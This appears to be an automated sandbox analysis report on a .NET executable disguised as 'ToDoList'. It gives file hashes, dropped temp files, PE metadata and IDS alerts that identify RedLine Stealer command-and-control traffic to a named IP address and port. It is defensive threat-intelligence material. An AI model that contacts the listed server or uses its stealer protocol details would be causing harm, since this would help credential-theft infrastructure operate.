MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFBFF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\Temp\tmpFC00.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\Temp\tmpFC01.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\Temp\tmpFC12.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.710365505131909
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Z6ojPnRBp1.exe
File size:	606'208 bytes
MD5:	b92fbfb1456ffbbda1a668cba58533a7
SHA1:	75bb0aebf4e0f239c3abb7604c1485a74b33e0c3
SHA256:	9ac72c52d01edd78f0012ecdd15ca8c839830c68b77681325dd11cda309eda85
SHA512:	71a5e7ca9df812a1fceede8218addedc2a8fce4bf92e6bb5f2ce5ae27aaf3c7825833bdc0b5b38453c4b79c041fff33ebbcda090c6664d25ad569fdb3fa2d9dc
SSDEEP:	12288:z/gp50g7ZeK50g73tl4dkKkpGrMY9UN0f1NSBqkhHo5zNteTgTJ74xWw:Up5F7AK5F79JpXWE+pmYygT+w
TLSH:	2FD4029C52DAC803CA9557791A21F2B5277C1EFCBD00DA274FCEADD7B83AA200D245D6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[.g..............0..&...........D... ...`....@.. ....................................`................................

File Icon


Icon Hash:	62ceac86b2968ea2

Static PE Info

General

Entrypoint:	0x4944aa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C65BE6 [Tue Mar 4 01:48:22 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push esp
add byte ptr [ecx+00h], ah
jnc 00007FF6915A0FF2h
imul eax, dword ptr [eax], 73h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x94455	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x96000	0x141c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x98000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92be8	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x924c0	0x92600	aa291b7c228ece20ba873e5f5eb7f7b9	False	0.9045620730145175	data	7.723290621411897	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x96000	0x141c	0x1600	d18f55a1983b59de3ff0c372d3f7227c	False	0.3107244318181818	data	5.081002031534127	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x98000	0xc	0x200	217cac669f0f528b21835847db048d85	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x96160	0xda8	Device independent bitmap graphic, 26 x 64 x 32, image size 3328	0.2823226544622426
RT_GROUP_ICON	0x96f08	0x14	data	1.1
RT_GROUP_ICON	0x96f1c	0x14	data	1.05
RT_VERSION	0x96f30	0x300	MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"	0.4427083333333333
RT_MANIFEST	0x97230	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	ToDoList
FileVersion	1.0.9194.8651
InternalName	zkuS.exe
LegalCopyright
LegalTrademarks
OriginalFilename	zkuS.exe
ProductName
ProductVersion	1.0.9194.8651
Assembly Version	1.0.9194.8651

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-07T21:38:44.329204+0100	1800000	Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect	1	192.168.2.4	49717	45.137.22.249	55615	TCP
2025-03-07T21:38:44.329204+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49717	45.137.22.249	55615	TCP
2025-03-07T21:38:49.748761+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	45.137.22.249	55615	192.168.2.4	49717	TCP
2025-03-07T21:38:50.121401+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49717	45.137.22.249	55615	TCP
2025-03-07T21:38:56.179570+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	45.137.22.249	55615	192.168.2.4	49717	TCP
2025-03-07T21:38:56.179570+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	45.137.22.249	55615	192.168.2.4	49717	TCP
2025-03-07T21:38:56.584422+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49721	45.137.22.249	55615	TCP
2025-03-07T21:38:58.184391+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.4	49722	45.137.22.249	55615	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 21:38:43.665292978 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:43.670806885 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:43.670922995 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:43.785911083 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:43.791280985 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:44.142060041 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:44.148261070 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:44.285007000 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:44.329204082 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:44.599610090 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:44.640104055 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:44.640173912 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:49.743628025 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:49.748760939 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:49.917301893 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:49.917524099 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:49.922595978 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:50.121308088 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:50.121335030 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:50.121354103 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:50.121371984 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:50.121387959 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:50.121401072 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:50.121464014 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:50.212688923 CET	49720	443	192.168.2.4	104.26.13.31
Mar 7, 2025 21:38:50.212732077 CET	443	49720	104.26.13.31	192.168.2.4
Mar 7, 2025 21:38:50.212800980 CET	49720	443	192.168.2.4	104.26.13.31
Mar 7, 2025 21:38:50.219299078 CET	49720	443	192.168.2.4	104.26.13.31
Mar 7, 2025 21:38:50.219310999 CET	443	49720	104.26.13.31	192.168.2.4
Mar 7, 2025 21:38:53.035038948 CET	443	49720	104.26.13.31	192.168.2.4
Mar 7, 2025 21:38:53.035161972 CET	49720	443	192.168.2.4	104.26.13.31
Mar 7, 2025 21:38:53.043989897 CET	49720	443	192.168.2.4	104.26.13.31
Mar 7, 2025 21:38:53.044013977 CET	443	49720	104.26.13.31	192.168.2.4
Mar 7, 2025 21:38:53.044440985 CET	443	49720	104.26.13.31	192.168.2.4
Mar 7, 2025 21:38:53.094816923 CET	49720	443	192.168.2.4	104.26.13.31
Mar 7, 2025 21:38:53.097282887 CET	49720	443	192.168.2.4	104.26.13.31
Mar 7, 2025 21:38:53.140331030 CET	443	49720	104.26.13.31	192.168.2.4
Mar 7, 2025 21:38:54.148824930 CET	443	49720	104.26.13.31	192.168.2.4
Mar 7, 2025 21:38:54.148924112 CET	443	49720	104.26.13.31	192.168.2.4
Mar 7, 2025 21:38:54.148963928 CET	49720	443	192.168.2.4	104.26.13.31
Mar 7, 2025 21:38:54.151886940 CET	49720	443	192.168.2.4	104.26.13.31
Mar 7, 2025 21:38:56.174302101 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.174702883 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.179569960 CET	55615	49717	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.179709911 CET	49717	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.179811001 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.180052042 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.182990074 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.188064098 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.532797098 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.538211107 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.538250923 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.538288116 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.538304090 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.538320065 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.538341045 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.538355112 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.538363934 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.538383961 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.538400888 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.538439989 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.538444996 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.538475037 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.538500071 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.538502932 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.538527966 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.538537025 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.538578033 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.538608074 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.543670893 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.543725967 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.543726921 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.543781042 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.543787956 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.543818951 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.543848038 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.543872118 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.543873072 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.543903112 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.543927908 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.543956041 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.584212065 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.584422112 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.632124901 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.632195950 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.643017054 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.643258095 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.648519993 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.648572922 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.648595095 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.648646116 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.648658991 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.648678064 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.648709059 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.648727894 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.648737907 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.648776054 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.648791075 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.648807049 CET	49721	55615	192.168.2.4	45.137.22.249
Mar 7, 2025 21:38:56.648821115 CET	55615	49721	45.137.22.249	192.168.2.4
Mar 7, 2025 21:38:56.648849964 CET	55615	49721	45.137.22.249	192.168.2.4
